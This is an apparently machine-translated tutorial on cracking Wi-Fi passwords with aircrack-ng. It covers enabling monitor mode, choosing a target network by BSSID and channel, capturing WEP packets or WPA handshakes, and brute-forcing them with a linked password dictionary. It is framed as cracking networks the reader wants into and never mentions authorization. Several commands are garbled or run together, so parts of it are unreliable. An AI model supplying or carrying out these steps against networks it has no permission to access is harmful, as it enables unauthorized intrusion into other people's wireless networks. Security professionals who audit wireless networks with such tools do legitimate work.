Aircrack-ng wireless cracking summary, aircrack-ng
In linux, I use the ubuntu environment. For ubuntu installation, you can directly use sudo apt-get install aircrack-ng
Linux should be able to use yum-y install aircrack-ng for installation. If its installation package does not have fangqian, It is very slow.
Bytes ------------------------------------------------------------------------------------
Method:
1. Make sure that your wireless connection is Enabled: ifconfig checks whether wlan0 is enabled or other wireless adapters are enabled. If not, the subsequent steps cannot be performed.
You can use ifconfig-a to check whether there is a wireless adapter, and then run the ifconfig wlan0 up command to start the wireless adapter (wlan0 is the name of the wireless adapter found in ifconfig-)
2. Enable the NIC to be in the listening mode:
sudo airmon-ng start wlan0
3. view the wireless network and capture wireless data packets.
sudo airodump-ng mon0
Note: Here, mon0 is the alias after your wlan starts listening. Generally, the following problems may occur:
rtl8187 - [phy1]SIOCSIFFLAGS: Name not unique on network
If this problem occurs, follow this to solve it.
sudo ifconfig wlan0 downsudo iwconfig wlan0 mode monitorsudo ifconfig wlan0 upsudo airodump-ng wlan0
Or:
airmon-ng check killairmon-ng start <interface>airodump-ng wlan0mon
However, network management is disabled.
Sudo servicenetwork-manager stop # stop the nm service udo servicenetwork-manager start # enable the nm Service
If everything is okay ====
The wireless signal that you can search for is displayed. PWR indicates the signal value. A larger value indicates the stronger the signal, and ESSID indicates the signal name. ENC is the encryption method (WEP is the easiest way to crack, wpa and wpa2 can only crack brute force)
Find an essid you want to crack
4. After determining the target
sudo airodump-ng -c 6 --bssid target's MAC -w file mon0
-C 6 refers to the channel of the signal, which is CH.
Target's MAC is the MAC address you want to crack
File is the data stored after aircrack-ng shakes hands with the target address.
5. After receiving enough packets (that is, data), start cracking.
sudo aircrack-ng file-01.cap
File-01.cap is the data stored after HandShaking
If it is a wep-type password, it can be cracked directly after receiving enough packets (1 w)
For wpa/wpa2 type encryption, you must receive the handshake packet before you can start brute force cracking and use the password file (given an address: http://static.hackersgarage.com/darkc0de.lst.gz) if the password is complex enough, such a password file is not enough. You need to encrypt the file more complex by yourself.
sudo aircrack-ng -w dic file-01.cap
The password can be obtained after successful cracking.